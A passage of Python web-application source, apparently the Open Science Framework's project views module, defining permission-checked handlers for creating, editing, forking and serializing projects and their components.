from api.waffle.utils import flag_is_active, storage_i18n_flag_active, storage_usage_flag_active
from framework.exceptions import HTTPError
from osf.models.nodelog import NodeLog
from osf.utils.functional import rapply
from osf.utils.registrations import strip_registered_meta_comments
from osf.utils import sanitize
from osf import features
from website import language
from website.util import rubeus
from website.ember_osf_web.views import use_ember_app
from osf.exceptions import NodeStateError
from website.project import new_node, new_private_link
from website.project.decorators import (
must_be_contributor_or_public_but_not_anonymized,
must_be_contributor_or_public,
must_be_valid_project,
must_have_permission,
must_not_be_registration,
must_not_be_retracted_registration,
)
from osf.utils.tokens import process_token_or_pass
from website.util.rubeus import collect_addon_js
from website.project.model import has_anonymous_link, NodeUpdateError, validate_title
from website.project.forms import NewNodeForm
from website.project.utils import sizeof_fmt
from website.project.metadata.utils import serialize_meta_schemas
from addons.wiki.models import WikiPage
from osf.models import AbstractNode, Collection, Contributor, Guid, PrivateLink, Node, NodeRelation, Preprint
from osf.models.licenses import serialize_node_license_record
from osf.utils.sanitize import strip_html
from osf.utils.permissions import ADMIN, READ, WRITE, CREATOR_PERMISSIONS, ADMIN_NODE
from website import settings
from website.views import find_bookmark_collection, validate_page_num
from website.views import serialize_node_summary, get_storage_region_list
from website.profile import utils
from addons.mendeley.provider import MendeleyCitationsProvider
from addons.zotero.provider import ZoteroCitationsProvider
from addons.wiki.utils import serialize_wiki_widget
from addons.wiki.models import WikiVersion
from addons.dataverse.utils import serialize_dataverse_widget
from addons.forward.utils import serialize_forward_widget
r_strip_html = lambda collection: rapply(collection, strip_html)
logger = logging.getLogger(__name__)
@must_be_valid_project
@must_have_permission(WRITE)
def edit_node(auth, node, **kwargs):
post_data = request.json
edited_field = post_data.get('name')
value = post_data.get('value', '')
new_val = None
if edited_field == 'title':
try:
node.set_title(value, auth=auth)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
new_val = node.title
elif edited_field == 'description':
node.set_description(value, auth=auth)
new_val = node.description
elif edited_field == 'category':
node.category = new_val = value
try:
node.save()
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
return {
'status': 'success',
'newValue': new_val # Used by x-editable widget to reflect changes made by sanitizer
}
##############################################################################
# New Project
##############################################################################
@must_be_logged_in
def project_new(**kwargs):
return {}
@must_be_logged_in
def project_new_post(auth, **kwargs):
user = auth.user
data = request.get_json()
title = strip_html(data.get('title'))
title = title.strip()
category = data.get('category', 'project')
template = data.get('template')
description = strip_html(data.get('description'))
campaign = data.get('campaign', None)
new_project = {}
if template:
original_node = AbstractNode.load(template)
changes = {
'title': title,
'category': category,
'template_node': original_node,
}
if description:
changes['description'] = description
project = original_node.use_as_template(
auth=auth,
changes={
template: changes,
}
)
else:
try:
project = new_node(category, title, user, description, campaign=campaign)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
new_project = _view_project(project, auth)
return {
'projectUrl': project.url,
'newNode': new_project['node'] if new_project else None
}, http_status.HTTP_201_CREATED
@must_be_logged_in
@must_be_valid_project
def project_new_from_template(auth, node, **kwargs):
new_node = node.use_as_template(
auth=auth,
changes=dict(),
)
return {'url': new_node.url}, http_status.HTTP_201_CREATED, None
##############################################################################
# New Node
##############################################################################
@must_be_valid_project
@must_have_permission(WRITE)
@must_not_be_registration
def project_new_node(auth, node, **kwargs):
"""
There's an APIv2 endpoint that does this same thing!
If you make changes here, see if they need to be made there.
"""
form = NewNodeForm(request.form)
user = auth.user
if form.validate():
try:
new_component = new_node(
title=strip_html(form.title.data),
user=user,
category=form.category.data,
parent=node,
)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
redirect_url = node.url
message = (
'Your component was created successfully. You can keep working on the project page below, '
'or go to the new <u><a href={component_url}>component</a></u>.'
).format(component_url=new_component.url)
if form.inherit_contributors.data and node.has_permission(user, WRITE):
for contributor in node.contributors:
# Using permission property off of Contributor model to get contributor permissions - not group member perms
perm = CREATOR_PERMISSIONS if contributor._id == user._id else Contributor.objects.get(user_id=contributor.id, node_id=node.id).permission
if contributor._id == user._id and not contributor.is_registered:
new_component.add_unregistered_contributor(
fullname=contributor.fullname, email=contributor.email,
permissions=perm, auth=auth, existing_user=contributor
)
else:
new_component.add_contributor(contributor, permissions=perm, auth=auth)
for group in node.osf_groups:
if group.is_manager(user):
new_component.add_osf_group(group, group.get_permission_to_node(node), auth=auth)
new_component.save()
redirect_url = new_component.url + 'contributors/'
message = (
'Your component was created successfully. You can edit the contributor permissions below, '
'work on your <u><a href={component_url}>component</a></u> or return to the <u> '
'<a href="{project_url}">project page</a></u>.'
).format(component_url=new_component.url, project_url=node.url)
status.push_status_message(message, kind='info', trust=True)
return {
'status': 'success',
}, 201, None, redirect_url
else:
# TODO: This function doesn't seem to exist anymore?
status.push_errors_to_status(form.errors)
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, redirect_url=node.url)
@must_be_logged_in
@must_be_valid_project
def project_before_fork(auth, node, **kwargs):
user = auth.user
prompts = node.callback('before_fork', user=user)
if node.has_pointers_recursive:
prompts.append(
language.BEFORE_FORK_HAS_POINTERS.format(
category=node.project_or_component
)
)
return {'prompts': prompts}
@must_be_logged_in
@must_be_valid_project
def project_before_template(auth, node, **kwargs):
prompts = []
for addon in node.get_addons():
if 'node' in addon.config.configs:
if addon.to_json(auth.user)['addon_full_name']:
prompts.append(addon.to_json(auth.user)['addon_full_name'])
return {'prompts': prompts, 'isRegistration': node.is_registration}
@must_be_valid_project
@must_be_contributor_or_public_but_not_anonymized
@must_not_be_registration
def node_registrations(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/{}/registrations/'.format(node._id))
return use_ember_app()
@must_be_valid_project
@must_be_contributor_or_public_but_not_anonymized
@must_not_be_retracted_registration
def node_forks(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/' + node._id + '/forks/')
return use_ember_app()
@must_be_valid_project
@must_not_be_retracted_registration
@must_be_logged_in
@must_have_permission(READ)
@ember_flag_is_active(features.EMBER_PROJECT_SETTINGS)
def node_setting(auth, node, **kwargs):
if node.is_registration and flag_is_active(request, features.EMBER_REGISTRIES_DETAIL_PAGE):
# Registration settings page obviated during redesign
return redirect(node.url)
auth.user.update_affiliated_institutions_by_email_domain()
auth.user.save()
ret = _view_project(node, auth, primary=True)
ret['include_wiki_settings'] = WikiPage.objects.include_wiki_settings(node)
ret['wiki_enabled'] = 'wiki' in node.get_addon_names()
ret['comments'] = {
'level': node.comment_level,
}
addon_settings = {}
for addon in ['forward']:
addon_config = apps.get_app_config('addons_{}'.format(addon))
config = addon_config.to_json()
config['template_lookup'] = addon_config.template_lookup
config['addon_icon_url'] = addon_config.icon_url
config['node_settings_template'] = os.path.basename(addon_config.node_settings_template)
addon_settings[addon] = config
ret['addon_settings'] = addon_settings
ret['categories'] = settings.NODE_CATEGORY_MAP
ret['categories'].update({
'project': 'Project'
})
return ret
@must_be_valid_project
@must_not_be_registration
@must_be_logged_in
@must_have_permission(WRITE)
def node_addons(auth, node, **kwargs):
ret = _view_project(node, auth, primary=True)
addon_settings = serialize_addons(node, auth)
ret['addon_capabilities'] = settings.ADDON_CAPABILITIES
# If an addon is default you cannot connect/disconnect so we don't have to load it.
ret['addon_settings'] = [addon for addon in addon_settings]
# Addons can have multiple categories, but we only want a set of unique ones being used.
ret['addon_categories'] = set([item for addon in addon_settings for item in addon['categories']])
# The page only needs to load enabled addons and it refreshes when a new addon is being enabled.
ret['addon_js'] = collect_node_config_js([addon for addon in addon_settings if addon['enabled']])
return ret
def serialize_addons(node, auth):
addon_settings = []
addons_available = [addon for addon in settings.ADDONS_AVAILABLE
if addon not in settings.SYSTEM_ADDED_ADDONS['node']
and addon.short_name not in ('wiki', 'forward', 'twofactor')]
for addon in addons_available:
addon_config = apps.get_app_config('addons_{}'.format(addon.short_name))
config = addon_config.to_json()
config['template_lookup'] = addon_config.template_lookup
config['addon_icon_url'] = addon_config.icon_url
config['node_settings_template'] = os.path.basename(addon_config.node_settings_template)
config['addon_short_name'] = addon.short_name
config['addon_full_name'] = addon.full_name
config['categories'] = addon.categories
config['enabled'] = node.has_addon(addon.short_name)
config['default'] = addon.short_name in settings.ADDONS_DEFAULT
if node.has_addon(addon.short_name):
node_json = node.get_addon(addon.short_name).to_json(auth.user)
config.update(node_json)
addon_settings.append(config)
addon_settings = sorted(addon_settings, key=lambda addon: addon['full_name'].lower())
return addon_settings
def collect_node_config_js(addons):
"""Collect webpack bundles for each of the addons' node-cfg.js modules. Return
the URLs for each of the JS modules to be included on the node addons config page.
:param list addons: List of node's addon config records.
"""
js_modules = []
for addon in addons:
source_path = os.path.join(
settings.ADDON_PATH,
addon['short_name'],
'static',
'node-cfg.js',
)
if os.path.exists(source_path):
asset_path = os.path.join(
'/',
'static',
'public',
'js',
addon['short_name'],
'node-cfg.js',
)
js_modules.append(asset_path)
return js_modules
@must_have_permission(WRITE)
@must_not_be_registration
def node_choose_addons(auth, node, **kwargs):
node.config_addons(request.json, auth)
@must_be_valid_project
@must_not_be_retracted_registration
@must_have_permission(READ)
@ember_flag_is_active(features.EMBER_PROJECT_CONTRIBUTORS)
def node_contributors(auth, node, **kwargs):
ret = _view_project(node, auth, primary=True)
ret['contributors'] = utils.serialize_contributors(node.contributors, node)
ret['access_requests'] = utils.serialize_access_requests(node)
ret['adminContributors'] = utils.serialize_contributors(node.parent_admin_contributors, node, admin=True)
return ret
@must_have_permission(ADMIN)
def configure_comments(node, **kwargs):
comment_level = request.json.get('commentLevel')
if not comment_level:
node.comment_level = None
elif comment_level in ['public', 'private']:
node.comment_level = comment_level
else:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
node.save()
@must_have_permission(ADMIN)
@must_not_be_registration
def configure_requests(node, **kwargs):
access_requests_enabled = request.get_json().get('accessRequestsEnabled')
auth = kwargs.get('auth', None)
node.set_access_requests_enabled(access_requests_enabled, auth, save=True)
return {'access_requests_enabled': access_requests_enabled}, 200
##############################################################################
# View Project
##############################################################################
@process_token_or_pass
@must_be_valid_project(retractions_valid=True)
@must_be_contributor_or_public
@ember_flag_is_active(features.EMBER_PROJECT_DETAIL)
def view_project(auth, node, **kwargs):
primary = '/api/v1' not in request.path
ret = _view_project(node, auth,
primary=primary,
embed_contributors=True,
embed_descendants=True
)
ret['addon_capabilities'] = settings.ADDON_CAPABILITIES
# Collect the URIs to the static assets for addons that have widgets
ret['addon_widget_js'] = list(collect_addon_js(
node,
filename='widget-cfg.js',
config_entry='widget'
))
ret.update(rubeus.collect_addon_assets(node))
access_request = node.requests.filter(creator=auth.user).exclude(machine_state='accepted')
ret['user']['access_request_state'] = access_request.get().machine_state if access_request else None
addons_widget_data = {
'wiki': None,
'mendeley': None,
'zotero': None,
'forward': None,
'dataverse': None
}
if 'wiki' in ret['addons']:
addons_widget_data['wiki'] = serialize_wiki_widget(node)
if 'dataverse' in ret['addons']:
addons_widget_data['dataverse'] = serialize_dataverse_widget(node)
if 'forward' in ret['addons']:
addons_widget_data['forward'] = serialize_forward_widget(node)
if 'zotero' in ret['addons']:
node_addon = node.get_addon('zotero')
zotero_widget_data = ZoteroCitationsProvider().widget(node_addon)
addons_widget_data['zotero'] = zotero_widget_data
if 'mendeley' in ret['addons']:
node_addon = node.get_addon('mendeley')
mendeley_widget_data = MendeleyCitationsProvider().widget(node_addon)
addons_widget_data['mendeley'] = mendeley_widget_data
ret.update({'addons_widget_data': addons_widget_data})
return ret
@process_token_or_pass
@must_be_valid_project(retractions_valid=True)
@must_be_contributor_or_public
def token_action(auth, node, **kwargs):
return redirect(node.url)
# Reorder components
@must_be_valid_project
@must_not_be_registration
@must_have_permission(WRITE)
def project_reorder_components(node, **kwargs):
"""Reorders the components in a project's component list.
:param-json list new_list: List of strings that include node GUIDs.
"""
ordered_guids = request.get_json().get('new_list', [])
node_relations = (
node.node_relations
.select_related('child')
.filter(child__is_deleted=False)
)
deleted_node_relation_ids = list(
node.node_relations.select_related('child')
.filter(child__is_deleted=True)
.values_list('pk', flat=True)
)
if len(ordered_guids) > len(node_relations):
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data=dict(message_long='Too many node IDs'))
# Ordered NodeRelation pks, sorted according the order of guids passed in the request payload
new_node_relation_ids = [
each.id for each in sorted(node_relations,
key=lambda nr: ordered_guids.index(nr.child._id))
]
if len(node_relations) == len(ordered_guids):
node.set_noderelation_order(new_node_relation_ids + deleted_node_relation_ids)
node.save()
return {'nodes': ordered_guids}
logger.error('Got invalid node list in reorder components')
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
@must_be_valid_project
@must_be_contributor_or_public
@must_not_be_retracted_registration
def project_statistics(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/' + node._id + '/analytics/')
return use_ember_app()
###############################################################################
# Make Private/Public
###############################################################################
@must_be_valid_project
@must_have_permission(ADMIN)
def project_set_privacy(auth, node, **kwargs):
permissions = kwargs.get('permissions')
if permissions is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
node.set_privacy(permissions, auth)
except NodeStateError as e:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data=dict(
message_short="Can't change privacy",
message_long=str(e)
))
return {
'status': 'success',
'permissions': permissions,
}
@must_be_valid_project
@must_have_permission(WRITE)
def update_node(auth, node, **kwargs):
# node.update() checks the node.WRITABLE_WHITELIST key list, which only allows contributors
# with write permission to modify the category, title, and description
data = r_strip_html(request.get_json())
try:
updated_field_names = node.update(data, auth=auth)
except NodeUpdateError as e:
raise HTTPError(400, data=dict(
message_short="Failed to update attribute '{0}'".format(e.key),
message_long=e.reason
))
# Need to cast tags to a string to make them JSON-serialiable
updated_fields_dict = {
key: getattr(node, key) if key != 'tags' else [str(tag) for tag in node.tags]
for key in updated_field_names
if key != 'logs' and key != 'modified' and key != 'last_logged'
}
return {'updated_fields': updated_fields_dict}
@must_be_valid_project
@must_have_permission(ADMIN)
@must_not_be_registration
def component_remove(auth, node, **kwargs):
"""Remove component, and recursively remove its children. If node has a
parent, add log and redirect to parent; else redirect to user dashboard.
"""
try:
node.remove_node(auth)
except NodeStateError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data={
'message_short': 'Error',
'message_long': 'Could not delete component: ' + str(e)
},
)
message = '{} has been successfully deleted.'.format(
node.project_or_component.capitalize()
)
id = '{}_deleted'.format(node.project_or_component)
status.push_status_message(message, kind='success', trust=False, id=id)
parent = node.parent_node
if parent and parent.can_view(auth):
redirect_url = node.parent_node.url
else:
redirect_url = '/dashboard/'
return {
'url': redirect_url,
}
@must_be_valid_project
@must_have_permission(ADMIN)
def remove_private_link(*args, **kwargs):
link_id = request.json['private_link_id']
try:
link = PrivateLink.objects.get(_id=link_id)
except PrivateLink.DoesNotExist:
raise HTTPError(http_status.HTTP_404_NOT_FOUND)
link.is_deleted = True
link.deleted = timezone.now()
link.save()
for node in link.nodes.all():
log_dict = {
'project': node.parent_id,
'node': node._id,
'user': kwargs.get('auth').user._id,
'anonymous_link': link.anonymous,
}
node.add_log(
NodeLog.VIEW_ONLY_LINK_REMOVED,
log_dict,
auth=kwargs.get('auth', None)
)
# TODO: Split into separate functions
def _render_addons(addons):
widgets = {}
configs = {}
js = []
css = []
for addon in addons:
configs[addon.config.short_name] = addon.config.to_json()
js.extend(addon.config.include_js.get('widget', []))
css.extend(addon.config.include_css.get('widget', []))
js.extend(addon.config.include_js.get('files', []))
css.extend(addon.config.include_css.get('files', []))
return widgets, configs, js, css
def _should_show_wiki_widget(node, user):
has_wiki = bool(node.get_addon('wiki'))
wiki_page = WikiVersion.objects.get_for_node(node, 'home')
if node.has_permission(user, WRITE) and not node.is_registration:
return has_wiki
else:
return has_wiki and wiki_page and wiki_page.html(node)
def _view_project(node, auth, primary=False,
embed_contributors=False, embed_descendants=False,
embed_registrations=False, embed_forks=False):
"""Build a JSON object containing everything needed to render
project.view.mako.
"""
node = AbstractNode.objects.filter(pk=node.pk).include('contributor__user__guids').get()
user = auth.user
parent = node.find_readable_antecedent(auth)
if user:
bookmark_collection = find_bookmark_collection(user)
bookmark_collection_id = bookmark_collection._id
in_bookmark_collection = bookmark_collection.guid_links.filter(_id=node._id).exists()
else:
in_bookmark_collection = False
bookmark_collection_id = ''
view_only_link = auth.private_key or request.args.get('view_only', '').strip('/')
anonymous = has_anonymous_link(node, auth)
addons = list(node.get_addons())
widgets, configs, js, css = _render_addons(addons)
redirect_url = node.url + '?view_only=None'
disapproval_link = ''
if (node.is_pending_registration and node.has_permission(user, ADMIN)):
disapproval_link = node.root.registration_approval.stashed_urls.get(user._id, {}).get('reject', '')
if (node.is_pending_embargo and node.has_permission(user, ADMIN)):
disapproval_link = node.root.embargo.stashed_urls.get(user._id, {}).get('reject', '')
# Before page load callback; skip if not primary call
if primary:
for addon in addons:
messages = addon.before_page_load(node, user) or []
for message in messages:
status.push_status_message(message, kind='info', dismissible=False, trust=True)
NodeRelation = apps.get_model('osf.NodeRelation')
is_registration = node.is_registration
data = {
'node': {
'disapproval_link': disapproval_link,
'id': node._primary_key,
'title': sanitize.unescape_entities(node.title),
'category': node.category_display,
'category_short': node.category,
'node_type': node.project_or_component,
'description': node.description or '',
'license': serialize_node_license_record(node.license),
'url': node.url,
'api_url': node.api_url,
'absolute_url': node.absolute_url,
'redirect_url': redirect_url,
'display_absolute_url': node.display_absolute_url,
'update_url': node.api_url_for('update_node'),
'in_dashboard': in_bookmark_collection,
'is_public': node.is_public,
'is_archiving': node.archiving,
'date_created': iso8601format(node.created),
'date_modified': iso8601format(node.last_logged) if node.last_logged else '',
'tags': list(node.tags.filter(system=False).values_list('name', flat=True)),
'children': node.nodes_active.exists(),
'child_exists': Node.objects.get_children(node, active=True).exists(),
'is_supplemental_project': node.has_linked_published_preprints,
'is_registration': is_registration,
'is_pending_registration': node.is_pending_registration if is_registration else False,
'is_retracted': node.is_retracted if is_registration else False,
'is_pending_retraction': node.is_pending_retraction if is_registration else False,
'retracted_justification': getattr(node.root.retraction, 'justification', None) if is_registration else None,
'date_retracted': iso8601format(getattr(node.root.retraction, 'date_retracted', None)) if is_registration else '',
'embargo_end_date': node.embargo_end_date.strftime('%A, %b %d, %Y') if is_registration and node.embargo_end_date else '',
'is_pending_embargo': node.is_pending_embargo if is_registration else False,
'is_embargoed': node.is_embargoed if is_registration else False,
'is_pending_embargo_termination': is_registration and node.is_pending_embargo_termination,
'registered_from_url': node.registered_from.url if is_registration else '',
'registered_date': iso8601format(node.registered_date) if is_registration else '',
'root_id': node.root._id if node.root else None,
'registered_meta': strip_registered_meta_comments(node.registered_meta),
'registered_schemas': serialize_meta_schemas(list(node.registered_schema.all())) if is_registration else False,
'is_fork': node.is_fork,
'is_collected': node.is_collected,
'collections': serialize_collections(node.collecting_metadata_list, auth),
'forked_from_id': node.forked_from._primary_key if node.is_fork else '',
'forked_from_display_absolute_url': node.forked_from.display_absolute_url if node.is_fork else '',
'forked_date': iso8601format(node.forked_date) if node.is_fork else '',
'fork_count': node.forks.exclude(type='osf.registration').filter(is_deleted=False).count(),
'private_links': [x.to_json() for x in node.private_links_active],
'link': view_only_link,
'templated_count': node.templated_list.count(),
'linked_nodes_count': NodeRelation.objects.filter(child=node, is_node_link=True).exclude(parent__type='osf.collection').count(),
'anonymous': anonymous,
'comment_level': node.comment_level,
'has_comments': node.comment_set.exists(),
'identifiers': {
'doi': node.get_identifier_value('doi'),
'ark': node.get_identifier_value('ark'),
},
'visible_preprints': serialize_preprints(node, user),
'institutions': get_affiliated_institutions(node) if node else [],
'has_draft_registrations': node.has_active_draft_registrations,
'access_requests_enabled': node.access_requests_enabled,
'storage_location': node.osfstorage_region.name,
'waterbutler_url': node.osfstorage_region.waterbutler_url,
'mfr_url': node.osfstorage_region.mfr_url,
'groups': list(node.osf_groups.values_list('name', flat=True)),
},
'parent_node': {
'exists': parent is not None,
'id': parent._primary_key if parent else '',
'title': parent.title if parent else '',
'category': parent.category_display if parent else '',
'url': parent.url if parent else '',
'api_url': parent.api_url if parent else '',
'absolute_url': parent.absolute_url if parent else '',
'registrations_url': parent.web_url_for('node_registrations', _guid=True) if parent else '',
'is_public': parent.is_public if parent else '',
'is_contributor_or_group_member': parent.is_contributor_or_group_member(user) if parent else '',
'is_contributor': parent.is_contributor(user) if parent else '',
'can_view': parent.can_view(auth) if parent else False,
},
'user': {
'is_contributor_or_group_member': node.is_contributor_or_group_member(user),
'is_contributor': node.is_contributor(user),
'is_admin': node.has_permission(user, ADMIN),
'is_admin_parent_contributor': parent.is_admin_parent(user, include_group_admin=False) if parent else False,
'is_admin_parent_contributor_or_group_member': parent.is_admin_parent(user) if parent else False,
'can_edit': node.has_permission(user, WRITE),
'can_edit_tags': node.has_permission(user, WRITE),
'has_read_permissions': node.has_permission(user, READ),
'permissions': node.get_permissions(user) if user else [],
'id': user._id if user else None,
'username': user.username if user else None,
'fullname': user.fullname if user else '',
'can_comment': node.can_comment(auth),
'show_wiki_widget': _should_show_wiki_widget(node, user),
'dashboard_id': bookmark_collection_id,
'institutions': get_affiliated_institutions(user) if user else [],
},
# TODO: Namespace with nested dicts
'addons_enabled': [each.short_name for each in addons],
'addons': configs,
'addon_widgets': widgets,
'addon_widget_js': js,
'addon_widget_css': css,
'node_categories': [
{'value': key, 'display_name': value}
for key, value in list(settings.NODE_CATEGORY_MAP.items())
]
}
# The default region should be at the top of the list for the UI, and on the project overview page
# the default region for a component is that of its parent node.
region_list = get_storage_region_list(user, node=node)
data.update({'storage_regions': region_list})
data.update({'storage_flag_is_active': storage_i18n_flag_active()})
if storage_usage_flag_active():
storage_usage = node.storage_usage
if storage_usage:
data['node']['storage_usage'] = sizeof_fmt(storage_usage)
if embed_contributors and not anonymous:
data['node']['contributors'] = utils.serialize_visible_contributors(node)
else:
data['node']['contributors'] = list(node.contributors.values_list('guids___id', flat=True))
if embed_descendants:
descendants, all_readable = _get_readable_descendants(auth=auth, node=node)
data['user']['can_sort'] = all_readable
data['node']['descendants'] = [
serialize_node_summary(node=each, auth=auth, primary=not node.has_node_link_to(each), show_path=False)
for each in descendants
]
if embed_registrations:
data['node']['registrations'] = [
serialize_node_summary(node=each, auth=auth, show_path=False)
for each in node.registrations_all.order_by('-registered_date').exclude(is_deleted=True)
]
if embed_forks:
data['node']['forks'] = [
serialize_node_summary(node=each, auth=auth, show_path=False)
for each in node.forks.exclude(type='osf.registration').exclude(is_deleted=True).order_by('-forked_date')
]
return data
def get_affiliated_institutions(obj):
ret = []
for institution in obj.affiliated_institutions.all():
ret.append({
'name': institution.name,
'logo_path': institution.logo_path,
'logo_path_rounded_corners': institution.logo_path_rounded_corners,
'id': institution._id,
})
return ret
def serialize_collections(cgms, auth):
return [{
'title': cgm.collection.title,
'name': cgm.collection.provider.name,
'url': '/collections/{}/'.format(cgm.collection.provider._id),
'status': cgm.status,
'type': cgm.collected_type,
'issue': cgm.issue,
'volume': cgm.volume,
'program_area': cgm.program_area,
'subjects': list(cgm.subjects.values_list('text', flat=True)),
'is_public': cgm.collection.is_public,
'logo': cgm.collection.provider.get_asset_url('favicon')
} for cgm in cgms if cgm.collection.provider and (cgm.collection.is_public or
(auth.user and auth.user.has_perm('read_collection', cgm.collection)))]
def serialize_preprints(node, user):
return [
{
'title': preprint.title,
'is_moderated': preprint.provider.reviews_workflow,
'is_withdrawn': preprint.date_withdrawn is not None,
'state': preprint.machine_state,
'word': preprint.provider.preprint_word,
'provider': {'name': 'OSF Preprints' if preprint.provider.name == 'Open Science Framework' else preprint.provider.name, 'workflow': preprint.provider.reviews_workflow},
'url': preprint.url,
'absolute_url': preprint.absolute_url
} for preprint in Preprint.objects.can_view(base_queryset=node.preprints, user=user).filter(date_withdrawn__isnull=True)
]
def serialize_children(child_list, nested, indent=0):
"""
Returns the serialized representation of a list of child nodes.
This is a helper function for _get_children and as such it does not
redundantly check permissions.
"""
results = []
for child in child_list:
results.append({
'id': child._id,
'title': child.title,
'is_public': child.is_public,
'parent_id': child.parentnode_id,
'indent': indent
})
if child._id in nested.keys():
results.extend(serialize_children(nested.get(child._id), nested, indent + 1))
return results
def _get_children(node, auth):
"""
Returns the serialized representation of the given node and all of its children
for which the given user has ADMIN permission.
"""
parent_node_sqs = NodeRelation.objects.filter(child=OuterRef('pk'), is_node_link=False).values('parent__guids___id')
children = (Node.objects.get_children(node)
.filter(is_deleted=False)
.annotate(parentnode_id=Subquery(parent_node_sqs[:1])))
admin_children = Node.objects.get_nodes_for_user(auth.user, ADMIN_NODE, children)
nested = defaultdict(list)
for child in admin_children:
nested[child.parentnode_id].append(child)
return serialize_children(nested[node._id], nested)
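# --- Illustrative sketch (added; not part of the OSF codebase) ---
# serialize_children() flattens a parent-id -> children mapping into an
# indented list. The stub objects below are hypothetical stand-ins for Node
# instances and carry only the attributes serialize_children() actually reads.
def _serialize_children_example():
    from collections import namedtuple
    Stub = namedtuple('Stub', ['_id', 'title', 'is_public', 'parentnode_id'])
    child = Stub('abcd1', 'Component A', True, 'root0')
    grandchild = Stub('abcd2', 'Analysis', False, 'abcd1')
    nested = {'root0': [child], 'abcd1': [grandchild]}
    # returns two dicts: 'Component A' at indent 0 and 'Analysis' at indent 1
    return serialize_children(nested['root0'], nested)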
@must_be_valid_project
@must_have_permission(ADMIN)
def private_link_table(node, **kwargs):
data = {
'node': {
'absolute_url': node.absolute_url,
'private_links': [x.to_json() for x in node.private_links_active],
}
}
return data
@collect_auth
@must_be_valid_project
@must_have_permission(ADMIN)
def get_editable_children(auth, node, **kwargs):
children = _get_children(node, auth)
return {
'node': {'id': node._id, 'title': node.title, 'is_public': node.is_public},
'children': children,
}
@must_be_valid_project
def get_recent_logs(node, **kwargs):
logs = list(reversed(node.logs._to_primary_keys()))[:3]
return {'logs': logs}
def _get_readable_descendants(auth, node, permission=None):
descendants = []
all_readable = True
for child in node.get_nodes(is_deleted=False):
if permission:
perm = permission.lower().strip()
if not child.has_permission(auth.user, perm):
all_readable = False
continue
# User can view child
if child.can_view(auth):
descendants.append(child)
# Child is a node link and user has write permission
elif node.linked_nodes.filter(id=child.id).exists():
if node.has_permission(auth.user, WRITE):
descendants.append(child)
else:
all_readable = False
else:
all_readable = False
for descendant in child.find_readable_descendants(auth):
descendants.append(descendant)
return descendants, all_readable
def serialize_child_tree(child_list, user, nested):
"""
Recursively serializes and returns a list of child nodes.
This is a helper function for node_child_tree and as such it does not
redundantly check permissions.
"""
serialized_children = []
for child in child_list:
if child.has_permission(user, READ) or child.has_permission_on_children(user, READ):
# is_admin further restricted here to mean user is a traditional admin group contributor -
# admin group membership not sufficient
contributors = [{
'id': contributor.user._id,
'is_admin': child.is_admin_contributor(contributor.user),
'is_confirmed': contributor.user.is_confirmed,
'visible': contributor.visible
} for contributor in child.contributor_set.all()]
serialized_children.append({
'node': {
'id': child._id,
'url': child.url,
'title': sanitize.unescape_entities(child.title),
'is_public': child.is_public,
'contributors': contributors,
'is_admin': child.has_permission(user, ADMIN),
'is_supplemental_project': child.has_linked_published_preprints,
},
'user_id': user._id,
'children': serialize_child_tree(nested.get(child._id), user, nested) if child._id in nested.keys() else [],
'nodeType': 'project' if not child.parentnode_id else 'component',
'category': child.category,
'permissions': {
'view': True,
'is_admin': child.has_permission(user, ADMIN)
}
})
return sorted(serialized_children, key=lambda k: len(k['children']), reverse=True)
def node_child_tree(user, node):
""" Returns the serialized representation (for treebeard) of a given node and its children.
:param user: OSFUser object
:param node: parent project Node object
:return: treebeard-formatted data
"""
serialized_nodes = []
assert node, '{} is not a valid Node.'.format(node._id)
parent_node_sqs = NodeRelation.objects.filter(child=OuterRef('pk'), is_node_link=False).values('parent__guids___id')
children = (Node.objects.get_children(node)
.filter(is_deleted=False)
.annotate(parentnode_id=Subquery(parent_node_sqs[:1]))
.include('contributor__user__guids')
)
nested = defaultdict(list)
for child in children:
nested[child.parentnode_id].append(child)
contributors = [{
'id': contributor.user._id,
'is_admin': node.is_admin_contributor(contributor.user),
'is_confirmed': contributor.user.is_confirmed,
'visible': contributor.visible
} for contributor in node.contributor_set.all().include('user__guids')]
can_read = node.has_permission(user, READ)
is_admin = node.has_permission(user, ADMIN)
if can_read or node.has_permission_on_children(user, READ):
serialized_nodes.append({
'node': {
'id': node._id,
'url': node.url if can_read else '',
'title': sanitize.unescape_entities(node.title) if can_read else 'Private Project',
'is_public': node.is_public,
'contributors': contributors,
'is_admin': is_admin,
'is_supplemental_project': node.has_linked_published_preprints,
},
'user_id': user._id,
'children': serialize_child_tree(nested.get(node._id), user, nested) if node._id in nested.keys() else [],
'kind': 'folder' if not node.parent_node or not node.parent_node.has_permission(user, READ) else 'node',
'nodeType': node.project_or_component,
'category': node.category,
'permissions': {
'view': can_read,
'is_admin': is_admin
}
})
return serialized_nodes
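# --- Illustrative output shape (added; not part of the OSF codebase) ---
# A hedged sketch of the treebeard-style structure node_child_tree() returns
# for a readable project with no children. All ids, titles and guids below
# are hypothetical.
_EXAMPLE_NODE_CHILD_TREE = [{
    'node': {
        'id': 'abc12',
        'url': '/abc12/',
        'title': 'Example Project',
        'is_public': True,
        'contributors': [{'id': 'user1', 'is_admin': True, 'is_confirmed': True, 'visible': True}],
        'is_admin': True,
        'is_supplemental_project': False,
    },
    'user_id': 'user1',
    'children': [],                    # nested entries come from serialize_child_tree()
    'kind': 'folder',
    'nodeType': 'project',
    'category': 'project',
    'permissions': {'view': True, 'is_admin': True},
}]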
@must_be_logged_in
@must_be_valid_project
def get_node_tree(auth, **kwargs):
node = kwargs.get('node') or kwargs['project']
tree = node_child_tree(auth.user, node)
return tree
@must_be_valid_project
@must_have_permission(ADMIN)
